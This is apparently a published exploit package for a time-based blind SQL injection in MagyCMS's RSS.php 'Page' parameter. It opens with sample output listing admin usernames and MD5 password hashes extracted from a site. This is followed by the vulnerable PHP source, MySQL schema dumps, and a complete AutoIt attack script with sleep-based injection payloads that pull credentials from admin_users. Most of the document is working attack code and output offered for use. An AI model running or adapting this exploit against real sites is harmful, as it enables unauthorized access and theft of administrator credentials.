Responce Time: 1108.17988076703 ms.
Need to fetch other: [12] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd4
Responce Time: 1164.49911938021 ms.
Need to fetch other: [11] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48
Responce Time: 1100.86175303173 ms.
Need to fetch other: [10] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c
Responce Time: 1083.53360421294 ms.
Need to fetch other: [9] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8
Responce Time: 1094.66155316143 ms.
Need to fetch other: [8] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8e
Responce Time: 1079.25520931559 ms.
Need to fetch other: [7] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee
Responce Time: 1089.64739495061 ms.
Need to fetch other: [6] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee4
Responce Time: 1075.80823227561 ms.
Need to fetch other: [5] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44
Responce Time: 1078.8765208783 ms.
Need to fetch other: [4] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44c
Responce Time: 1110.63264652718 ms.
Need to fetch other: [3] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca
Responce Time: 1081.87636987911 ms.
Need to fetch other: [2] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca6
Responce Time: 1079.1007891431 ms.
Need to fetch other: [1] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca6c
Responce Time: 1100.79408534274 ms.
Need to fetch other: [ *NONE* ] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
----------------------------------------
Username: [manager] MD5 HASH: [04e8e47e68a7b58594fdcf994c5d490d]
----------------------------------------
----------------------------------------
Username: [root] MD5 HASH: [e10adc3949ba59abbe56e057f20f883e]
----------------------------------------
----------------------------------------
Username: [d] MD5 HASH: [326373da562269316790326c00a9972f]
----------------------------------------
----------------------------------------
Username: [test] MD5 HASH: [74a5d1ffce472f0206dd48c8ee44ca6c]
----------------------------------------
----------------------------------------
----------------------------------------
[+] Usernames And MD5 passwords saved to : mainlog.txt [+]
----------------------------------------
----------------------------------------
[+] Exploit Finished!. GooD Luck;) [+]
----------------------------------------
[+] Exit! [+]
--------------------------------------------------------------------
Vulnerable Code Section:
========================== BEGIN ===================================
//magycms/Framework/public/RSS.php?Page=
/*
<?
// Check if data.inc.php is included
if(!isset($FRAMEWORK_PATH))
require_once(dirname(__FILE__)."/../../Admin/Inc/data.inc.php");
require_once(dirname(__FILE__)."/../Common.php");
require_once(dirname(__FILE__)."/../Links.php");
require_once(dirname(__FILE__)."/../URL.php");
require_once($CMS_ROOTPATH . 'Admin/Inc/db/adodb.inc.php');
/**
* Returns News Category for page with passed name
*
* @param string $page
* @return int ID of category
*/
function getCatByPage($page)
{
global $db, $tbl_Pages, $tbl_News_Config, $SITEID;
// Get Page ID for fetching Category
$query = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
$hResult = $db->Execute($query);
if (!$hResult->NumRows())
return -1;
$row = $hResult->FetchRow();
$ID = $row[0];
// Fetch category form DB;
$query = "SELECT `Category` FROM $tbl_News_Config WHERE `ID`=$ID AND `site`=$SITEID";
$hResult = $db->Execute($query);
if (!$hResult->NumRows())
return -1;
$row = $hResult->FetchRow();
return $row[0];
}
//////////////////// Opening database connection ////////////////
$db = &ADONewConnection($DBType);
$db->PConnect($DBServer,$DBUserName,$DBPassword,$DBName);
// Switch to the specified charset
if($DBType=="mysql") $db->Execute("SET NAMES \"$DBCharset\"");
///////////////////////// Get Site ID ///////////////////////////
if (isset($_GET['site'])) {
$SITEID = $_GET['site'];
if (!is_numeric($SITEID))
$SITEID = 1;
} else {
$SITEID = 1;
}
////////////////// Get site URL from DB /////////////////////////
$hResult = $db->Execute("SELECT `URL` FROM $tbl_Sites WHERE `ID`=$SITEID");
$Root_URL = "aaa";
if ($hResult->NumRows())
{
$row = $hResult->FetchRow();
$Root_URL = $row[0];
}
//echo($Root_URL."<br>");
////////////////// Retrieving Language Prefixes /////////////////
$Lang_Prefix = array();
$hpResult = $db->Execute("SELECT `ID`, `Prefix` FROM $tbl_Lang WHERE `site`=$SITEID");
if($hpResult) {
for($i = 0; $i < $hpResult->RowCount(); $i++) {
$apResult = $hpResult->FetchRow();
$Lang_Prefix[$apResult[0]] = $apResult[1];
}
}
///////////////////////// Determine language ////////////////////
if (isset($_GET['lang'])) {
$lang = $_GET['lang'];
if (!is_numeric($lang))
$lang = GetSiteSetting('Default_lang');
} else {
$lang = GetSiteSetting('Default_lang');
}
///////////////////////// Determine news Page and Category //////
$cat = -1;
$page = "";
if (isset($_GET['Page'])) {
$page = $_GET['Page'];
$cat = getCatByPage($page);
}
//////////////////// Get Page information if such exists ////////
$title = "News";
$text = "";
if ($page != "")
{
$pQuery = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
$hResult = $db->Execute($pQuery);
if (!$hResult->NumRows())
return -1;
$row = $hResult->FetchRow();
$ID = $row[0];
// Fetch Title and Text form DB;
$pQuery = "SELECT Title, Text
FROM $tbl_News_Config AS s INNER JOIN $tbl_News_Config_Data AS d ON s.ID = d.ID
WHERE s.ID=$ID AND d.language=$lang AND site=$SITEID";
$hResult = $db->Execute($pQuery);
if ($hResult->NumRows())
{
$row = $hResult->FetchRow();
$title = $row[0];
$text = $row[1];
}
}
// Construct link to News page
$mainLink = ($page == "") ? "" : $Root_URL.CLink::construct($page, $lang);
///////////////////////// GET NEWS //////////////////////////////
if ($cat == -1)
$mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date`
FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID`
WHERE d.language=$lang AND s.`site`=$SITEID";
else
$mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date`
FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID`
WHERE d.language=$lang AND s.`site`=$SITEID AND s.`Category`=$cat";
$hResult = $db->Execute($mainQuery);
// check if there is something to echo
if (!$hResult->NumRows())
die();
///////////////////////// Echo News in RSS //////////////////////
CRSS::echoHeader($title, $mainLink, $text, getdate(), $Lang_Prefix[$lang]);
for ($i = 0; $i < $hResult->NumRows(); $i++)
{
$row = $hResult->FetchRow();
$today = date("Y-m-d H:i:s");
$startDate = $row[4];
$endDate = $row[5];
$startDateIsOK = (substr($startDate, 0, 10) == "0000-00-00" || $today >= $startDate);
$endDateIsOK = (substr($endDate, 0, 10) == "0000-00-00" || $today <= $endDate);
if ( $startDateIsOK && $endDateIsOK )
{
$link = $Root_URL.CURL::getFormattedURL(CLink::construct($page, $lang), "id", "{$row[0]}");
CRSS::echoItem($row[2], $link, $link, $row[1], $row[3]);
}
}
CRSS::echoFooter();
?>
<?
class CRSS {
public static function echoHeader ($title, $link, $desc, $lastBD, $lang)
{
// send XML header
header('Content-Type: application/rss+xml; charset=utf-8');
// echo XML header
echo('<?xml version="1.0" encoding="utf-8"?>');
// echo RSS opening tags
echo('<rss version="2.0"><channel>\n');
if ($title != "") echo ("<title>$title</title>\n");
if ($link != "") echo ("<link>$link</link>\n");
if ($desc != "") echo ("<description>$desc</description>\n");
if ($lastBD != "") echo ("<lastBuildDate>$lastBD Mon, 12 Sep 2005 18:37:00 GMT</lastBuildDate>\n");
if ($lang != "") echo ("<language>$lang en-us</language>\n");
}
public static function echoFooter ()
{
// echo RSS closing tags
echo('</channel></rss>');
}
public static function echoItem($title, $link, $guid, $pubDate, $desc)
{
// Strip undesired characters from description
$desc = ereg_replace("&[^;]*;", "", $desc);
$desc = strip_tags($desc);
// Turn Published date into RFC format
$time = strtotime($pubDate);
$pubDate = gmdate("r", $time);
// Echo the item
echo ("<item>\n");
if ($title != "") echo ("<title>$title</title>\n");
if ($link != "") echo ("<link>$link</link>\n");
if ($guid != "") echo ("<guid>$guid</guid>\n");
if ($pubDate != "") echo ("<pubDate>$pubDate</pubDate>\n");
if ($desc != "") echo ("<description>$desc</description>\n");
echo ("</item>\n");
}
}
?>
*/
========================= END OF VULNERABLE CODE SECTION ===========================
mysql> show tables \g
+-------------------------+
| Tables_in_SNIP_SNIP_SNIP|
+-------------------------+
| admin_menus |
| admin_menus_category |
| admin_menus_permissions |
| admin_users |
| banner_categories |
| banners |
| banners_data |
| banners_struct |
| cms_languages |
| cms_messages_categories |
| cms_messages_data |
| cms_messages_struct |
| cms_settings |
| core_messages |
| counter |
+-------------------------+
15 rows in set (0.00 sec)
mysql> explain admin_users \g
+----------+------------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+----------+------------------+------+-----+---------+----------------+
| ID | int(10) unsigned | NO | PRI | NULL | auto_increment |
| Username | varchar(100) | YES | | 0 | |
| Password | varchar(100) | YES | | 0 | |
| GUID | varchar(32) | YES | | 0 | |
| Level | int(10) unsigned | YES | MUL | 0 | |
| Name | varchar(100) | YES | | 0 | |
| Email | varchar(45) | YES | | 0 | |
| MID | int(10) unsigned | YES | | 0 | |
+----------+------------------+------+-----+---------+----------------+
8 rows in set (0.00 sec)
*************************************************
A R E Y O U R E A D Y?
LETS GOOOOOOOOOOOOOOOOOOOOOOOOOOO!
*************************************************
#ce
Global $USERNAMES_IN_ARRAY,$MD5HASHSTRINGSIN_ARRAY,$dd
;// COMMAND LINE //
if $CmdLine[0]=0 Then
MsgBox(64,"","This is a console application." & @CRLF & "Usage: " & @CRLF & @ScriptName & ' http://targetsite.tld')
Exit
EndIf
$host=$CmdLine[1]
if $host='' Then
ConsoleWrite(@CRLF & '[+] Empty Command Line Argument? WTF? [+]' & @CRLF)
Exit
EndIf
ConsoleWrite(@CRLF)
$hellomsg= _StringRepeat('#',54) & @CRLF
$allmsg=$hellomsg & '# MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit #' & @CRLF & _
'# Exploitation technique: Time Based #' & @CRLF & _
'# Author: AkaStep & BOT_25 #' & @CRLF & _
$hellomsg;
ConsoleWrite($allmsg);
$useragent='Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1';
#cs
First checking is here any internet connection?
#ce
$separator=@CRLF & _StringRepeat('-',40) & @CRLF;
ConsoleWrite($separator & '[+] Verifying your internet connection.... Please Wait...[+] ' & $separator)
Sleep(1500)
$hcheckconnectionstatus='http://packetstormsecurity.org';// 100% TODD will kill me ASAP for this xD)
HttpSetUserAgent($useragent)
$is_offline_or_online=_INetGetSource($hcheckconnectionstatus,True);
if @error Then
ConsoleWrite($separator & "[+] Sorry Dude! It seems your machine is offline. [+] " & @CRLF & "[+] Can't continue...Exit. [+] " & $separator);
Exit
EndIf
ConsoleWrite($separator & '[+] Inet Connection is OK .... [+] ' & $separator)
$target=$host & "/magycms/Framework/public/RSS.php?Page="
;// Vulnerable versions of magycms always panics here by exposing following message to public.
$isvulnerable='Call to a member function NumRows() on a non-object';// Peace of Blah Blah Stuff :P
$possiblevals='';//initializing of variable...
$forusernames='';// initializing it too...
for $i=28 to 61
$forusernames&=Chr(Asc("A")+$i) & @CRLF
Next
for $i=0 To 9
$possiblevals&=$i & @CRLF
; nums from 0 1 2 3 4 5 6 7 8 up to 9
Next
; then alphas from a b c d e up to f
$forusernames&=$possiblevals;
$possiblevals&='a' & @CRLF & 'b' & @CRLF & 'c' & @CRLF & 'd' & @CRLF & 'e' & @CRLF & 'f' & @CRLF
$array=StringSplit($possiblevals,@CRLF,3)
$bruteusernames=StringSplit($forusernames,@CRLF,3);
$i='';//reset.
ConsoleWrite($separator & '[+] Verifying is Target Site Vulnerable? Please wait...[+]' & $separator);
$maybe=_INetGetSource($target & "'",TRUE) ;//verifying...Is target site vulnerable?
if StringInStr($maybe,$isvulnerable,0) Then
$true='vulnerable'; // GPC=OFF
ConsoleWrite($separator & '[+] Reply from target site: [+]' & @CRLF & $separator & '[+] - - - - * Vulnerable! * - - - - . [+]' & $separator & @CRLF & _
'[+] Trying to get average value for sleep(1) if condition is TRUE...[+]' & @CRLF & $separator & '[+] Please wait... [+] ' & $separator & @CRLF);
$additionalchecking_needed='false';
;// Will check 3 times (with TRUE condition) to get optimal avg value.
;//////////////////// Responce time when condition is TRUE //////////////
local $docalc;
for $i=1 to 3
$checkfirsttime=TimerInit();
HttpSetUserAgent($useragent);
_INetGetSource($target & "' or (select if(8='8',sleep(1),0))-- AnD 9='9",True);
$rtime=TimerDiff($checkfirsttime);
$docalc+=$rtime;
Next
$checkfirsttime='';
$rtime='';
$i='';
$docalcavg=Int($docalc/3);//avg value for sleep(1).
$docalc='';
ConsoleWrite($separator & '[+] AVG sleep timeout FOR TRUE CONDITION IS: ' & $docalcavg & ' ms [+]' & $separator);
;////////////// EOF TRUE CONDITION CHECKING ///////////////////////////
;////////////////////// WITH FALSE CONDITION ///////////////////////////
for $i=1 to 3
$checkfirsttime=TimerInit();
HttpSetUserAgent($useragent);
_INetGetSource($target & "' or (select if(8='index.php',sleep(1),0))-- AnD 9='9",True);
$rtime=TimerDiff($checkfirsttime);
$docalc+=$rtime;
Next
$checkfirsttime='';
$rtime='';
$i='';
$avgfalsecondition=Int($docalc/3);
$docalc='';
ConsoleWrite($separator & '[+] AVG sleep timeout FOR FALSE CONDITION IS: ' & $avgfalsecondition & ' ms [+] ' & $separator);
;//////////////// END OF FALSE CONDITION ///////////////////////////////
getusername();// Fetch usernames Baby)//
Else
$true='not vulnerable'; //GPC =ON ?
ConsoleWrite($separator & '[+] Target Site is NOT vulnerable:( .Exit. [+]' & $separator)
;// Lazy to verify it using another technique.
Exit
EndIf
Func getusername()
;//Brain f****cking
Local $oldoffset=0
$USERNAMES='';
ConsoleWrite($separator & '[+] Getting To Fetch Username(s) from table... Please wait... [+] ' & $separator)
$usernamen='';
$tyi=0;
$x=0;
$stopat=0;
do
$tyi+=1
$stopat+=1
if $tyi=21 Then
$tyi=1;
$x+=1
$USERNAMES&=$usernamen & @CRLF
$usernamen='';//reset
EndIf
$limitval= ' limit 1 offset ' & $x
if $x<6 and $stopat<=5160 Then
for $q=1 To UBound($bruteusernames) - 2
$fetch_username=$target & "' or (select if(substr(Username," & $tyi & ",1)='" & $bruteusernames[$q] & "',sleep(1),0) from admin_users" &$limitval & ")-- AnD 4='4" & @CRLF
$timer=TimerInit();
HttpSetUserAgent($useragent);
$inethandle=_INetGetSource($fetch_username,True)
$diftime=TimerDiff($timer);
if ($diftime/$docalcavg)>=0.8 Then
$usernamen&=$bruteusernames[$q]
ConsoleWrite('[+] TRUE AT OFFSET [' & $x & '] Currently : [' & $usernamen & ']. Responce Time: ' & $diftime & ' ms. Logging to axa.txt... [+]' & @CRLF);
FileWrite('axa.txt',$separator & @CRLF & '[+] TRUE AT OFFSET[' & $x & ']' & @CRLF & $usernamen & @CRLF & 'Current Payload: ' & $fetch_username & @CRLF &'Responce Time: ' & $diftime & ' ms ' & @CRLF & $separator)
EndIf
$timer='';
$inethandle='';
$diftime='';
Next
;//
EndIf
until $x=6
$USERNAMES_IN_ARRAY=StringSplit($USERNAMES,@CRLF,3);
; debug ok _ArrayDisplay($USERNAMES_IN_ARRAY);
$y='';
for $i=0 to UBound($USERNAMES_IN_ARRAY) - 1
if Not $USERNAMES_IN_ARRAY[$i]='' Then
$y+=1;
ConsoleWrite($separator & '[#] Username' & $i & ' => [' & $USERNAMES_IN_ARRAY[$i] & '] [#]' & $separator)
EndIf
Next
$i='';
ConsoleWrite($separator & '* Total ' & $y & ' users *' & $separator)
$y='';
ConsoleWrite($separator & '[+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+]' & $separator)
ConsoleWrite($separator & '[+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait... [+]' & $separator)
;// debug ok! Exit //
MD5EDPASSWORD();//Yeah baby it's time to fetch MD5 passwords.//
EndFunc;=> getusername();
;//Below:Get passwords Function.
Func MD5EDPASSWORD()
Local $stopat;
Local $md5hash;
$MD5HASHSTRINGS='';
if $true='vulnerable' Then
for $rt=0 To 6
if not $md5hash='' Then
$MD5HASHSTRINGS&=$md5hash & @CRLF
EndIf
$md5hash='';// we need reset obtained hash here if offset incremented.
$stopat+=1;
if $rt<6 And $stopat<=3072 Then
for $x=1 to 32 ;// because => strlen('MD5-ED-STRING')=32 . We need loop through it.
for $i=0 to UBound($array) - 2
$dynamicpayload="' or (select if(substr(Password," & $x & ",1)='" & $array[$i] & "',sleep(1),0) from admin_users limit 1 offset " & $rt & ")-- AND 5='5"
$doittime=TimerInit();
HttpSetUserAgent($useragent);
$trigger2=_INetGetSource($target & $dynamicpayload,TRUE)
$responcetime=TimerDiff($doittime);
if ($responcetime/$docalcavg) >=0.8 Then ;//Sleep()-ed. 99% chance that we got it!
$md5hash&=$array[$i]
$howmuchneeded=32-StringLen($md5hash);
if $howmuchneeded='0' then
$howmuchneeded=' *NONE* '
EndIf
$tolog=$separator & '[+] TRUE AT OFFSET [' & $rt & '] [+]' & @CRLF & 'Currently MD5 hash is : ' & $md5hash & @CRLF & 'Responce Time: ' & $responcetime & ' ms.' & @CRLF & 'Need to fetch other: [' & $howmuchneeded & '] symbol(s). ' & @CRLF & 'Logging to axa.txt... ' & $separator
ConsoleWrite($tolog);
FileWrite('axa.txt',$tolog);
$tolog='';
EndIf
Next
Next
EndIf
Next
;// DISPLAYING PLUS SAVING TO MAINLOG.TXT
$MD5HASHSTRINGS_IN_ARRAY=StringSplit($MD5HASHSTRINGS,@CRLF,3);
for $i=0 To UBound($USERNAMES_IN_ARRAY) - 2
if Not $USERNAMES_IN_ARRAY[$i]='' and Not $MD5HASHSTRINGS_IN_ARRAY[$i]='' Then
$dd&=$separator & 'Username: [' & $USERNAMES_IN_ARRAY[$i] & '] MD5 HASH: [' & $MD5HASHSTRINGS_IN_ARRAY[$i] & ']' & $separator
EndIf
Next
ConsoleWrite($separator & $dd & $separator)
FileWrite(@ScriptDir & "\mainlog.txt",$separator & 'Target Site: ' & $host & @CRLF & $dd & @CRLF)
ConsoleWrite($separator & '[+] Usernames And MD5 passwords saved to : mainlog.txt [+]' & $separator)
for $i=0 to 2
Sleep(1000);
Beep(200,300);
Next
ConsoleWrite($separator & '[+] Exploit Finished!. GooD Luck;) [+]' & $separator)
ConsoleWrite('[+] Exit! [+]');
Exit;
EndIf
EndFunc;=> MD5EDPASSWORD();
#cs
Thats All!
********************* AZERBAIJAN BLACK HATZ***********************************
Of course we never forget our friends so, A BIG RESPECTS+THANKS TO ALL:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================
Thanks + Respect to all friends!
/AkaStep & BOT_25
#ce